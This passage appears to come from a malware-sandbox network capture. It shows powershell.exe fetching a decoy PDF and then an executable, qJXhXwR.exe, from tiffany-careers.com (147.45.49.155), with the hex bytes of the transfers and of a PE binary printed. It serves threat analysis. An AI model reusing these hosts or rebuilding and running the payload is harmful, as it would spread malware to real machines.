program cannot be run in DOS mode.$(z{z{z{zz{zz{zz{zz{z{{{zz{{z{zz{Richz{PEL
2024-12-28 08:35:21 UTC	16384	IN	Data Raw: 33 d2 89 10 89 13 89 17 85 f6 0f 84 89 00 00 00 8d 41 02 89 45 fc 66 8b 01 83 c1 02 66 3b c2 75 f5 2b 4d fc d1 f9 74 71 83 f9 03 77 6c 6a 30 58 89 45 fc 85 c9 74 16 66 8b 04 56 66 2b 45 fc 66 83 f8 09 77 54 42 3b d1 72 ed 6a 30 58 83 f9 03 75 1d 8b 4d f8 0f b7 06 6a 30 5a 2b c2 89 01 0f b7 46 02 2b c2 89 03 0f b7 46 04 2b c2 eb 15 83 f9 02 75 14 0f b7 06 6a 30 59 2b c1 89 03 0f b7 46 02 2b c1 89 07 eb 0c 83 f9 01 75 07 0f b7 0e 2b c8 89 0f 33 c0 40 eb 02 33 c0 5f 5e 5b c9 c2 08 00 8b ff 55 8b ec 83 ec 14 53 56 57 85 c9 74 5c 83 65 fc 00 83 65 f4 00 6a 03 58 66 89 45 ec 8d 45 fc 50 68 e0 14 40 00 6a fc 51 ff 15 10 13 41 00 85 c0 75 37 8b 45 fc 85 c0 74 30 8b 18 8d 75 ec 83 ec 10 8b fc 8b 4b 54 6a 01 a5 50 a5 a5 a5 ff 15 4c 14 41 00 ff 53 54 8b 45 fc 50 8b Data Ascii: 3AEff;u+Mtqwlj0XEtfVf+EfwTB;rj0XuMj0Z+F+F+uj0Y+F+u+3@3_^[USVWt\eejXfEEPh@jQAu7Et0uKTjPLASTEP
2024-12-28 08:35:21 UTC	16384	IN	Data Raw: 5e eb 0b ff 72 f4 8b cb 52 e8 53 02 00 00 5f 8b c3 5b 5d c2 04 00 6a 08 b8 10 ed 40 00 e8 52 5b 00 00 8b f1 89 75 f0 68 78 02 41 00 e8 6f ba ff ff ff 75 08 83 65 fc 00 8b ce e8 1c 00 00 00 84 c0 75 0a ff 75 08 8b ce e8 57 ff ff ff 83 4d fc ff 8b c6 e8 ea 5a 00 00 c2 04 00 8b ff 55 8b ec 51 8b 45 08 32 d2 85 c0 74 12 a9 00 00 ff ff 75 0b 0f b7 c0 50 e8 52 c7 ff ff b2 01 8a c2 59 5d c2 04 00 6a 04 b8 44 ed 40 00 e8 e5 5a 00 00 8b d1 83 65 f0 00 8b 7d 0c 85 ff 79 02 33 ff 8b 75 10 85 f6 79 02 33 f6 b8 ff ff ff 7f 2b c7 3b c6 7c 67 8b 1a 8d 04 37 8b 4b f4 3b c1 7e 04 8b f1 2b f7 3b f9 7e 02 33 f6 85 ff 75 28 3b f1 75 24 8d 4b f0 e8 38 c8 ff ff 8b 4d 08 83 c0 10 89 01 21 7d fc c7 45 f0 01 00 00 00 8b c1 e8 51 5a 00 00 c2 0c 00 8b ca e8 bb c7 ff ff 8b 4d 08 50 Data Ascii: ^rRS_[]j@R[uhxAoueuuWMZUQE2tuPRY]jD@Ze}y3uy3+;\|g7K;~+;~3u(;u$K8M!}EQZMP
2024-12-28 08:35:21 UTC	16384	IN	Data Raw: fc 8d 41 28 57 8b 7d fc 89 45 fc 3b f8 74 3b 53 56 8b 1f 85 db 74 24 8b f3 8b 5b 04 8d 4e 08 e8 c0 e8 ff ff 56 6a 00 ff 15 f4 11 41 00 50 ff 15 dc 12 41 00 85 db 75 df 8b 45 fc c7 07 00 00 00 00 83 c7 04 3b f8 75 c9 5e 5b 5f c9 c3 8b ff 55 8b ec 56 57 8b 39 33 f6 56 6a ff 57 ff 15 30 12 41 00 b9 80 00 00 00 3d 02 01 00 00 74 08 85 c0 74 0c 3b c1 75 15 85 c0 74 04 3b c1 75 02 8b f7 8b 45 08 5f 89 30 5e 5d c2 10 00 51 8b 4d 04 e8 1e e4 ff ff cc 8b ff 55 8b ec 51 53 56 8b f1 8b da 33 c9 57 3b f3 74 45 8b 7d 08 85 ff 74 3e 66 39 0f 74 39 8b cf e8 47 df ff ff 2b de 89 45 fc 3b d8 73 0c 8b 45 0c 85 c0 74 2b 83 20 00 eb 26 50 57 53 56 ff 15 1c 14 41 00 8b 45 0c 83 c4 10 85 c0 74 02 89 30 8b 45 fc 03 c6 eb 0b 8b 45 0c 85 c0 74 02 89 08 8b c6 5f 5e 5b c9 c2 08 00 Data Ascii: A(W}E;t;SVt$[NVjAPAuE;u^[_UVW93VjW0A=tt;ut;uE_0^]QMUQSV3W;tE}t>f9t9G+E;sEt+ &PWSVAEt0EEt_^[
2024-12-28 08:35:21 UTC	16384	IN	Data Raw: ac 31 01 00 7c 31 01 00 42 31 01 00 16 31 01 00 ec 30 01 00 c0 30 01 00 8e 30 01 00 60 30 01 00 30 30 01 00 fe 2f 01 00 c0 2f 01 00 8e 2f 01 00 6c 2f 01 00 0e 2f 01 00 da 2e 01 00 b6 2e 01 00 90 2e 01 00 48 2e 01 00 f8 2d 01 00 a8 2d 01 00 5a 2d 01 00 26 2d 01 00 f0 2c 01 00 b0 2c 01 00 6a 2c 01 00 40 2c 01 00 1a 2c 01 00 ec 2b 01 00 c0 2b 01 00 78 2b 01 00 48 2b 01 00 20 2b 01 00 e6 2a 01 00 aa 2a 01 00 72 2a 01 00 2c 2a 01 00 fa 29 01 00 a6 29 01 00 7a 29 01 00 4c 29 01 00 1e 29 01 00 f4 28 01 00 b2 28 01 00 56 28 01 00 20 28 01 00 ca 27 01 00 7a 27 01 00 3c 27 01 00 06 27 01 00 d0 26 01 00 7e 26 01 00 4c 26 01 00 22 26 01 00 ee 25 01 00 a8 25 01 00 6a 25 01 00 32 25 01 00 e4 24 01 00 a8 24 01 00 74 24 01 00 3e 24 01 00 08 24 01 00 cc 23 01 00 8e 23 01 Data Ascii: 1\|1B11000`000///l//...H.--Z-&-,,j,@,,++x+H+ +*r,*))z)L))((V( ('z'<''&~&L&"&%%j%2%$$t$>$$##

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49710	147.45.49.155	443	7952	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:35:25 UTC	92	OUT	GET /Project_Information.pdf HTTP/1.1 Host: tiffany-careers.com Connection: Keep-Alive
2024-12-28 08:35:25 UTC	428	IN	HTTP/1.1 200 OK etag: "5d662-676a8e3a-23c54;;;" last-modified: Tue, 24 Dec 2024 10:34:34 GMT content-type: application/pdf content-length: 382562 accept-ranges: bytes date: Sat, 28 Dec 2024 08:35:25 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46" connection: close
2024-12-28 08:35:26 UTC	16384	IN	Data Raw: 25 50 44 46 2d 31 2e 35 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 2d 55 53 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 33 31 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 37 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 36 20 30 20 52 20 31 38 20 30 20 52 20 32 30 20 30 20 52 20 32 34 20 30 20 52 20 32 36 20 30 20 52 20 32 38 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20 32 20 30 20 Data Ascii: %PDF-1.5%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 31 0 R/MarkInfo<</Marked true>>>>endobj2 0 obj<</Type/Pages/Count 7/Kids[ 3 0 R 6 0 R 18 0 R 20 0 R 24 0 R 26 0 R 28 0 R] >>endobj3 0 obj<</Type/Page/Parent 2 0
2024-12-28 08:35:26 UTC	16384	IN	Data Raw: 09 bc ff 00 ae 12 7f e8 26 be d8 f3 0f 96 7c 41 ff 00 21 ab 8f ad 65 d6 a7 88 3f e4 35 71 f5 ac ba 62 3d 03 e1 3f fc 8d 10 7f bf fd 0d 7d 0b 5f 3d 7c 27 ff 00 91 a2 0f f7 ff 00 a1 af a1 68 00 a2 8a 29 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 2a 95 e3 66 40 be 82 ae d6 7d d7 fa f3 40 10 d1 45 14 c0 28 a2 8a 00 28 a2 8a 00 bf 6a db a1 00 f6 a8 ef 24 e0 20 3f 5a 5b 2f b8 Data Ascii: &\|A!e?5qb=?}_=\|'h)((((((((((((((((((((((((((((((((((((*f@}@E((j$ ?Z[/
2024-12-28 08:35:26 UTC	16384	IN	Data Raw: 28 a2 8a 00 28 a2 ac d9 db 19 e6 c9 1f 22 f5 34 0a 52 51 57 66 9d 8c 66 3b 55 04 73 de aa ea 90 9c ac a0 7d 6b 48 70 30 29 b2 c6 b2 c6 c8 c3 83 54 79 f1 a9 69 f3 1c ed 15 2d c4 0d 04 a5 58 71 d8 d4 55 27 a0 9a 6a e8 28 a2 8a 06 14 51 45 00 6c 69 9f f1 e8 3f de 35 83 e2 fb 02 c2 3b d4 19 c7 ca d8 ec 2b 7b 4c ff 00 8f 31 fe f1 ab 17 36 e9 75 6e f0 c8 32 ae 30 6a 91 e6 d4 f8 d9 e5 94 55 ed 57 4c 97 4c bb 68 d8 1f 2c 9f 91 bd 6a 8d 51 21 45 14 50 01 45 14 50 07 6f e1 1f f9 05 bf fb f5 c8 ea 20 8d 46 70 47 f1 57 5d e1 1f f9 06 3f fb f5 85 e2 6b 26 b6 d5 1a 50 3f 77 28 ca 9a 42 31 68 a2 8a 63 0a 28 a2 80 0a 28 a7 24 6d 2c 8b 12 0c b3 9c 01 40 1d e7 85 94 ae 85 18 61 fc 46 b9 ff 00 12 5b 98 35 56 60 38 90 67 35 d8 69 d6 c2 d2 c6 28 71 c8 5e 7e b5 53 5d d3 3f b4 Data Ascii: (("4RQWff;Us}kHp0)Tyi-XqU'j(QEli?5;+{L16un20jUWLLh,jQ!EPEPo FpGW]?k&P?w(B1hc(($m,@aF[5V`8g5i(q^~S]?
2024-12-28 08:35:26 UTC	16384	IN	Data Raw: 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 51 bb 4d b2 06 1d 0d 5e a6 49 18 91 0a 9f c2 80 33 28 a7 3a 34 6d b5 85 36 98 05 14 51 40 05 00 12 70 3b 9a 2a dd b4 04 1d ec 3e 82 80 2c 22 ec 8c 2f a0 ac d7 fb ed f5 ad 5e d5 94 ff 00 7d be b4 00 94 51 45 00 14 51 45 00 14 51 45 00 68 db 7f a8 5a c3 9f fe 3e 65 ff 00 78 d6 e5 bf fa 95 ac 39 ff 00 e3 e6 4f f7 8d 4b 3a 70 db b2 3a 28 a2 91 d8 14 51 45 00 14 76 a2 8e d4 01 b7 63 ff 00 1e 6b 58 f3 02 26 60 7d 6b 62 c3 fe 3d 56 a9 6a 36 e5 25 f3 40 f9 5b af d6 9f 43 96 94 92 a8 d3 28 d1 45 14 8e a0 a2 8a 28 00 a2 8a 92 08 4c f2 aa 0e 99 e4 d0 26 d2 57 26 Data Ascii: Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@QM^I3(:4m6Q@p;*>,"/^}QEQEQEhZ>ex9OK:p:(QEvckX&`}kb=Vj6%@[C(E(L&W&
2024-12-28 08:35:26 UTC	16384	IN	Data Raw: e3 ae 07 7f 4a e3 3e 2b 69 9f db fe 0c b4 d6 ed 62 7c da e2 52 19 70 c2 37 1c e4 7b 71 5d 09 ea 73 bd 8e bd 08 f3 5b 9e 09 c8 f7 ad 18 8f 15 c0 f8 2f 5b 97 c4 3e 1d b3 74 ba 58 e7 b4 c4 37 6b b0 33 36 3e e9 c9 e8 08 ef 8a ee 21 7e 2a 5a b3 29 6c 58 ba b5 8a fa d2 4b 69 86 51 c6 3e 9e f5 e7 af 6e fa 66 ac 6d e5 e7 6b 6d 27 fb ca 7f fa c6 bd 15 5e bc e7 c7 de 22 d3 f4 7d 7e 18 ae ad 6e 64 91 e0 0e 1a 27 50 3e f1 1d fe 95 e4 e6 58 09 62 52 95 25 ef 2f c8 ef c1 62 d5 16 e3 37 ee b0 92 17 b9 d4 23 b2 88 64 ae 22 51 e9 eb fa e4 d7 7f a7 d8 c5 a7 59 25 bc 43 80 32 c7 fb c7 b9 af 34 f0 8f 8b 34 dd 57 c5 96 d6 f0 d9 dd ac d2 ef 21 e4 75 2a 3e 52 4f 41 5e a2 cd 4b 2d cb e5 87 72 9d 55 ef 3f c8 78 cc 5c 6b 28 c6 9b d1 7e 63 25 3c 56 74 ee aa 4b 33 61 57 2c c4 f6 02 Data Ascii: J>+ib\|Rp7{q]s[/[>tX7k36>!~Z)lXKiQ>nfmkm'^"}~nd'P>XbR%/b7#d"QY%C244W!u>ROA^K-rU?x\k(~c%<VtK3aW,
2024-12-28 08:35:26 UTC	16384	IN	Data Raw: 3c 4d dd a4 78 58 ec 8f 92 2e 74 35 f2 3d 56 8a 6a 3a c8 8a e8 c1 95 86 41 07 a8 a7 57 59 f3 8f 40 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 af 33 f8 8f aa c9 25 fc 5a 62 31 11 46 bb dc 03 f7 98 f4 fc 87 f3 af 4c af 22 f8 81 03 c5 e2 99 64 61 f2 cb 1a b2 fe 03 1f d2 b0 c4 36 a1 a1 eb e4 90 8c b1 6b 9b a2 67 2d 45 14 57 9e 7d a8 57 a5 7c 37 d5 64 9a da e3 4d 95 89 10 e1 e2 c9 e8 0f 51 f9 ff 00 3a f3 5a ee 3e 1a 42 ed aa 5e 4c 3e e2 44 14 fd 49 ff 00 eb 56 d4 1b 53 47 99 9c 42 32 c2 49 cb a1 e9 d4 51 45 7a 27 c3 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 15 4a f7 57 Data Ascii: <MxX.t5=Vj:AWY@(((((((((((3%Zb1FL"da6kg-EW}W\|7dMQ:Z>B^L>DIVSGB2IQEz'Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@JW
2024-12-28 08:35:26 UTC	16384	IN	Data Raw: 7e 43 63 df 8a e6 c4 42 52 b5 8f 7b 25 c5 d1 c3 f3 aa ae d7 b1 c3 51 5d af fc 2b 5d 53 fe 7e ed 7f f1 ef f0 a3 fe 15 ae a9 ff 00 3f 76 bf f8 f7 f8 57 37 b0 9f 63 de fe d5 c2 7f 39 89 e1 3f f9 1a b4 ff 00 fa eb fd 0d 7b 67 6a e0 bc 3d e0 2b 9d 37 57 8a f6 ee e6 36 58 4e e4 58 b3 c9 f7 c8 e9 5d ed 75 e1 e1 28 c6 cc f9 ac e7 13 4e bd 65 2a 6e e9 20 af 27 f8 8d ff 00 23 2c 7f f5 ec bf fa 13 57 ac 57 21 e2 cf 07 4b af 5d c5 79 6b 70 91 ca a9 e5 b2 c9 9c 11 92 47 4f ad 55 68 b9 42 c8 c7 2a af 0a 18 95 3a 8e c8 f2 8a 2b b5 ff 00 85 6b aa 7f cf dd af fe 3d fe 14 7f c2 b5 d5 3f e7 ee d7 ff 00 1e ff 00 0a e2 f6 13 ec 7d 5f f6 ae 13 f9 ce 2a bd a7 c1 df f2 29 d8 7f b8 7f 99 ae 2c 7c 35 d4 f2 33 77 6d 8e ff 00 7b fc 2b d1 34 9d 3d 74 ad 2e de c9 1c ba c2 bb 77 1e e6 Data Ascii: ~CcBR{%Q]+]S~?vW7c9?{gj=+7W6XNX]u(Nen '#,WW!K]ykpGOUhB:+k=?}_*),\|53wm{+4=t.w
2024-12-28 08:35:26 UTC	16384	IN	Data Raw: fb 03 58 9c 41 1a b9 6b 69 dc fc a3 3d 50 fa 73 93 9f 7a f6 09 75 9d 32 1b 6f b4 c9 a8 da 2c 00 67 cc 33 2e df cf 35 e6 be 23 f8 27 65 7d 72 f7 3a 25 e8 b2 2e 72 6d e5 5d d1 8f a1 1c 81 ed cd 61 d9 fc 09 d4 da 61 f6 ed 5e ce 38 b3 cf 90 ac ec 7f 30 28 19 47 e2 7f 8c 57 c5 d3 7d 93 47 57 97 4b d3 bf 7b 2c e0 60 3b 12 17 3f 41 9c 0f ad 74 ff 00 01 ff 00 e4 11 ac 0f fa 78 4f fd 04 d7 49 2f c3 5d 36 0f 05 5e 78 7f 4b 6f 22 4b ad a6 4b a9 57 7b b9 04 1e 7a 7e 55 27 c3 ff 00 04 4d e0 ab 6b e8 65 bf 4b bf b4 ba b0 2b 1e cd b8 07 dc d0 23 b3 a2 8a 28 03 33 c4 56 cd 79 e1 8d 5a d5 06 5a 6b 39 a3 50 3d 4a 11 5f 3c fc 2e d6 6d 74 2f 1c 41 35 f4 a2 18 25 8d e0 69 1b 80 84 f4 cf e2 05 7d 33 5e 49 e2 af 82 e9 a9 6a 33 5f 68 97 b1 5a 99 98 bb db ce a7 60 63 fd d2 3a 0f Data Ascii: XAki=Pszu2o,g3.5#'e}r:%.rm]aa^80(GW}GWK{,`;?AtxOI/]6^xKo"KKW{z~U'MkeK+#(3VyZZk9P=J_<.mt/A5%i}3^Ij3_hZ`c:
2024-12-28 08:35:26 UTC	16384	IN	Data Raw: de ee 2b 9e a2 80 3d 52 09 e3 b9 85 65 89 83 23 0c 82 29 66 62 90 bb 0e a1 72 2b 8a f0 c6 aa d6 d7 62 d2 43 fb a9 0f cb 9e c6 bb 3b 8f f8 f6 93 fd d3 48 47 98 dd 3b 4d 77 2b c8 c5 98 b1 e4 d4 38 1e 95 24 df eb e4 ff 00 78 d3 29 8c 4c 0f 4a 30 3d 29 68 a0 04 c0 f4 a3 03 d2 96 8a 00 15 8c 4c 1d 0e 19 4e 41 15 e9 d6 12 34 9a 6c 12 39 cb 34 60 93 f8 57 98 37 dd 3f 4a f4 dd 37 fe 41 36 ff 00 f5 c8 7f 2a 4c 3a 99 12 b1 79 58 b7 27 34 dc 53 9f ef b7 d6 9b 50 7a 71 d8 31 46 28 a2 81 86 28 c5 14 50 00 38 39 1e b5 d0 5b 31 7b 74 63 d4 8a e7 eb 7a d4 e2 d1 09 f4 a6 8e 6c 4a d1 11 de 5e 7d 9d 76 af 2e 7f 4a c7 79 1e 53 97 62 69 d3 c8 64 9d 98 9e fc 54 74 1a 52 a6 a2 83 8a 31 45 14 8d 44 c0 a7 a4 8f 19 ca 31 1f 4a 6d 14 09 ab 9b 36 57 82 71 b1 f8 71 fa d5 ca e7 62 73 Data Ascii: +=Re#)fbr+bC;HG;Mw+8$x)LJ0=)hLNA4l94`W7?J7A6*L:yX'4SPzq1F((P89[1{tczlJ^}v.JySbidTtR1ED1Jm6Wqqbs
2024-12-28 08:35:26 UTC	16384	IN	Data Raw: 5a d3 c6 61 c7 b5 00 66 51 41 e0 e0 d1 40 05 14 51 40 05 14 51 40 05 6a af dd 5f a5 65 56 aa fd d5 fa 50 02 d1 45 14 80 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a Data Ascii: ZafQA@Q@Q@j_eVPE((((((((((((((((((((((((((((((((((((((((((((((((((((((

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49713	147.45.49.155	443	7952	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:35:28 UTC	56	OUT	GET /qJXhXwR.exe HTTP/1.1 Host: tiffany-careers.com
2024-12-28 08:35:29 UTC	439	IN	HTTP/1.1 200 OK etag: "108a00-676f088f-23c40;;;" last-modified: Fri, 27 Dec 2024 20:05:35 GMT content-type: application/x-executable content-length: 1083904 accept-ranges: bytes date: Sat, 28 Dec 2024 08:35:29 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46" connection: close
2024-12-28 08:35:29 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f 31 29 eb 2b 50 47 b8 2b 50 47 b8 2b 50 47 b8 9f cc b6 b8 3e 50 47 b8 9f cc b4 b8 b7 50 47 b8 9f cc b5 b8 0a 50 47 b8 b5 f0 80 b8 2a 50 47 b8 79 38 42 b9 05 50 47 b8 79 38 43 b9 3a 50 47 b8 79 38 44 b9 23 50 47 b8 22 28 c4 b8 23 50 47 b8 22 28 c0 b8 2a 50 47 b8 22 28 d4 b8 0e 50 47 b8 2b 50 46 b8 06 52 47 b8 8e 39 49 b9 7b 50 47 b8 8e 39 44 b9 2a 50 47 b8 8e 39 b8 b8 2a 50 47 Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$o1)+PG+PG+PG>PGPGPGPGy8BPGy8C:PGy8D#PG"(#PG"(PG"(PG+PFRG9I{PG9DPG9PG
2024-12-28 08:35:29 UTC	16384	IN	Data Raw: c0 48 8d 45 20 48 8b d6 4c 8d 45 28 48 89 44 24 20 e8 5e f5 ff ff 85 c0 0f 88 96 70 04 00 48 8d 4d c0 e8 55 54 00 00 44 8b 45 20 e9 00 ff ff ff 48 8d 0d f9 ba 0e 00 e8 5c 09 00 00 33 c0 4c 8d 5c 24 70 49 8b 5b 30 49 8b 73 38 49 8b e3 41 5f 41 5e 5d c3 48 89 5c 24 08 48 89 7c 24 10 55 48 8b ec 48 83 ec 70 41 8b 18 45 33 db ff cb 44 89 5d c8 4c 8b d1 89 5d b4 49 8b f8 4c 89 5d d0 c7 45 d8 01 00 00 00 41 8b cb 44 89 5d e0 45 8a cb 4c 89 5d e8 c7 45 f0 01 00 00 00 c7 45 b0 02 00 00 00 44 8b 07 41 8b d0 41 8d 40 01 89 07 e8 75 06 00 00 48 85 c0 74 2c 45 84 c9 75 27 48 8b 40 08 48 8b 10 66 44 39 5a 08 75 d7 8b 12 83 ea 0b 74 4f 83 fa 01 75 cb 85 c9 75 42 44 8a ca 44 89 45 b8 eb be 49 8d 8a 68 02 00 00 48 8d 55 b0 e8 98 07 00 00 8d 43 01 48 8d 4d e0 89 07 e8 de Data Ascii: HE HLE(HD$ ^pHMUTDE H\3L\$pI[0Is8IA_A^]H\$H\|$UHHpAE3D]L]IL]EAD]EL]EEDAA@uHt,Eu'H@HfD9ZutOuuBDDEIhHUCHM
2024-12-28 08:35:29 UTC	16384	IN	Data Raw: 84 24 88 00 00 00 89 74 24 50 4d 8b c5 48 89 44 24 48 8b d7 8b 84 24 18 01 00 00 89 44 24 40 8b 84 24 20 01 00 00 89 44 24 38 8b 44 24 60 89 5c 24 30 44 89 74 24 28 89 44 24 20 e8 5c 00 00 00 48 8b b4 24 28 01 00 00 8b d8 48 8b ce e8 8e 87 00 00 48 8b ce c7 46 10 01 00 00 00 89 1e e8 59 73 00 00 85 c0 0f 84 71 49 04 00 83 ff 1d 74 08 49 8b cd e8 ac bf 01 00 45 33 f6 48 8d 4c 24 70 e8 5b 87 00 00 41 8b c6 48 81 c4 c8 00 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 48 8b c4 48 89 58 20 4c 89 40 18 48 89 48 08 55 56 57 41 54 41 55 41 56 41 57 48 8d 68 c1 48 81 ec 90 00 00 00 8b 3d e1 80 0e 00 45 33 ed 41 8b d9 44 8b fa 83 fa 0c 0f 84 33 49 04 00 83 fa 0d 7e 1b 83 fa 0f 0f 8e 25 49 04 00 83 fa 11 0f 84 1c 49 04 00 83 fa 14 0f 84 13 49 04 00 83 ff ff 0f 84 36 Data Ascii: $t$PMHD$H$D$@$ D$8D$`\$0Dt$(D$ \H$(HHFYsqItIE3HL$p[AHA_A^A]A\_^][HHX L@HHUVWATAUAVAWHhH=E3AD3I~%III6
2024-12-28 08:35:29 UTC	16384	IN	Data Raw: c1 89 83 c8 00 00 00 3b 53 1c 0f 8d e6 42 04 00 4c 63 9d 58 01 00 00 41 3b d3 0f 8f eb 42 04 00 8b 43 18 48 8b 7b 10 41 2b c1 49 63 d0 8b 04 87 89 04 97 41 8d 40 01 48 8b 7c 24 48 49 8b d7 48 2b 93 98 00 00 00 48 d1 fa 48 63 c8 48 8b 43 10 89 14 88 8b 95 48 01 00 00 45 3b d8 0f 8f 8e fb ff ff 45 8d 58 02 44 89 9d 58 01 00 00 e9 7e fb ff ff 83 ff 10 0f 85 39 03 00 00 8b 95 48 01 00 00 49 83 c6 06 e9 af fa ff ff 49 83 c6 02 83 c7 ab 49 8b ce 40 f6 c7 01 74 06 41 bd 01 00 00 00 46 0f be 9c 1f f8 80 0c 00 8b c7 48 8d 3d 4e 33 ff ff 44 89 5c 24 58 44 0f be 94 38 e8 80 0c 00 44 89 54 24 50 45 85 d2 75 0c b8 ff ff ff 7f 44 8b d0 89 44 24 50 bf 01 00 00 00 45 0f b7 0e 4c 8d 71 02 44 89 4c 24 54 41 8d 41 f1 83 f8 01 0f 86 da 6d 04 00 48 c7 c0 ff ff ff ff 8b c8 89 Data Ascii: ;SBLcXA;BCH{A+IcA@H\|$HIH+HHcHCHE;EXDX~9HIII@tAFH=N3D\$XD8DT$PEuDD$PELqDL$TAAmH
2024-12-28 08:35:29 UTC	16384	IN	Data Raw: 00 00 49 8b 0c df 49 8b d5 e8 16 40 01 00 49 89 3c df 48 ff c3 49 3b de 72 e8 4c 8b 6c 24 48 e9 cf fa ff ff 4c 8d 3d d5 f3 fe ff 49 8b 5c fd 00 48 85 db 74 61 48 8b 73 08 48 85 f6 74 36 48 8b 46 18 ff 08 48 8b 46 18 44 39 30 75 16 48 8b 0e e8 cf 3f 01 00 48 8b 4e 18 ba 04 00 00 00 e8 c1 3f 01 00 ba 20 00 00 00 48 8b ce e8 b4 3f 01 00 4c 89 73 08 8b 43 10 83 f8 05 0f 8d f6 00 00 00 b8 01 00 00 00 44 89 33 48 8b cb 89 43 10 8d 50 17 e8 8e 3f 01 00 4d 89 74 fd 00 48 ff c7 49 3b fc 72 88 e9 62 fa ff ff 44 8b 5c 24 40 45 33 c0 48 8b 9d a8 00 00 00 e9 ac f6 ff ff 41 83 e9 01 0f 88 dd fa ff ff 41 ff c2 41 ff c0 e9 a0 fa ff ff 48 8b 9d b0 00 00 00 48 8b cb c6 00 00 e8 fd 06 00 00 49 8b c7 89 43 10 33 c0 89 03 e9 93 f8 ff ff 49 8b 0a 48 8b 17 48 85 c0 74 20 44 0f Data Ascii: II@I<HI;rLl$HL=I\HtaHsHt6HFHFD90uH?HN? H?LsCD3HCP?MtHI;rbD\$@E3HAAAHHIC3IHHt D
